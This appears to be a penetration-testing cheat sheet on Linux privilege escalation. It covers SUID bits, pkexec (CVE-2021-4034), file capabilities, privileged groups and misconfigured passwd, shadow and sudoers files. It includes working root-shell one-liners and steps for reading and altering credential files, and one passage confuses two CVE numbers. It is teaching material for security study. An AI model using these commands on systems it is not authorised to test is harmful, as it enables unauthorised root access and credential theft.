File permissions
SUID/GUID bit
This is a permission on Linux allowing users to execute a file with the permission of the owner (SUID) or the group owner (GUID).
# Variants: "-04000" "-4000" | "-4001"
$ find / -perm -u=s -type f -ls 2>/dev/null
$ find / -perm -g=s -type f -ls 2>/dev/null
Once you found a file with the SUID bit, either there is a known way to exploit it using GTFOBins, or you have to investigate manually.
pkexec - CVE-2021-4034
Policy Kit (Polkit) is part of the Linux authorization system. It used and installed by default on every major Linux distribution. We can interact with it using the /usr/bin/pkexec
SUID file.
Some distributions were vulnerable to CVE-2021-3560 (<v119). See arthepsy PoC (1.0k β), or berdav PoC (1.9k β).
π Example Usage: /usr/bin/pkexec bash
β‘οΈ See also: cve_2021_4034_pwnkit_lpe_pkexec
on Metasploit.
Manual investigation
If the script hand-made, or not on GTFOBins, then you can use refer to (basic) Reverse Engineering, e.g., the commands below to hopefully find which files and environment variables the script is using
-
strace
: see every system call -
strings
: extract every readable string
You may be able to make the script do what you want by editing environment variables or files that it uses.
Executable
When exploiting a command, you will usually want to run another executable. Two commands you will most likely run are:
-
/bin/bash -i
: start an interactive bash -
/bin/bash -p
: do not drop privilege (SUID, start the bash as root)
Capabilities
Capabilities are a level below SUID/GUID permissions. They can be applied on files and processes.
$ grep Cap /proc/self/status
CapInh: 0000000000000000 -- from parent to child; if requested
CapPrm: 0000000000000000 -- capabilities the process can use
CapEff: 0000000000000000 -- capabilities that are currently enabled
CapBnd: 00000000a80425fb -- the capabilities the processes are allowed to use
CapAmb: 0000000000000000 -- from parent to child; with conditions
$ capsh --decode="00000000a80425fb" # human readable
It's possible for an administrator to allow an executable to use some "features" that usually would require root privileges (ex: creating sockets, creating raw TCP packets...).
Find executables with capabilities
$ getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep
$ /usr/bin/python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
β οΈ Capabilities are often followed by +
and a modifier.
- Effective (
e
): the permissions the process can use - Permitted (
p
): the process can use or drop permissions - Inheritable (
i
): permissions are inherited by child processes
To retain permitted capabilities when creating a new process, refer to this thread. In Python, you could use python-prctl.
# Example: binary has 'setuid' with '+p'
# sudo apt install libcap-dev
# pip install python-prctl
import prctl
prctl.cap_effective.setuid=True
β‘οΈ Look for the executable on GTFOBins or HackTricks.
β‘οΈ Use Linux Tracers and alternatives for files not on GTFOBins
There are roughly 40 capabilities:
-
cap_chown
: could take over/etc/shadow
to edit a password -
cap_setuid
: set current user to be root (0
) -
cap_setgid
: set the current group to be root, shadow, docker, etc. -
cap_dac_read_search
: arbitrary file reading, directory listing -
cap_dac_override
: can write to any file -
cap_sys_admin
: can mount filesystems -
cap_sys_time
: arbitrary change the date and time, affect cron tasks -
cap_kill
: kill a process, which may help if we need to restart it -
cap_fowner
: we can change the permissions (chmod
) to /etc/shadow -
cap_setfcap
: we can set capabilities on any file -
cap_linux_immutable
: can write to immutable files -
cap_net_raw
: can create raw packets and sniff raw packets -
cap_net_bind_service
: can use ports below 1024 -
cap_net_admin
: edit firewall configuration -
cap_sys_ptrace
: can inject a shellcode into a process memory -
cap_sys_module
: add and remove kernel modules - ...
To add or remove capabilities, you can use:
$ sudo setcap cap_setuid=eip your_binary
$ sudo setcap -r your_binary
$ sudo setcap --drop=cap_setuid your_binary
Special Groups
DO NOT ASSUME ANYTHING. A user not in a group (not in the sudo
group, may still be able to perform the action (e.g. run sudo).
-
Users in the
adm
group are able to read all logs. Log management utilities such as logrotate may be vulnerable. See also: logrotten. -
See also: Docker socket/permissions
-
See also: LXC/LXD permissions
-
Users in the
shadow
group can read/etc/shadow
-
Users in the
disk
group can read/write any file
Misconfigured system files
If /etc/passwd
was intentionally misconfigured or if it is a misconfigured embedded device.
$ cat /etc/passwd
# if you can write it: make your user part of root group
# if you can write it: add a new user that is part of root group
# if you can write it: remove the 'x' to su without password
If /etc/shadow
was intentionally misconfigured
$ cat /etc/shadow
# if you can read it: try to brute force the password
# if you can write it: change the root password
# (copy a password or generate one mkpasswd -m sha-512 toto)
If /etc/sudoers
was intentionally misconfigured
$ cat /etc/sudoers
# if you can read it: find users that will be useful to compromise
# if you can write it: add yourself in
# your_user ALL=(ALL:ALL) ALL
Until 1979/Unix V7, passwords were stored in /etc/passwd
, so a regular user could read them, and try brute-forcing the password.
$ cat /etc/shadow
- root:x:...
+ root:hashed_password:...
# openssl passwd toto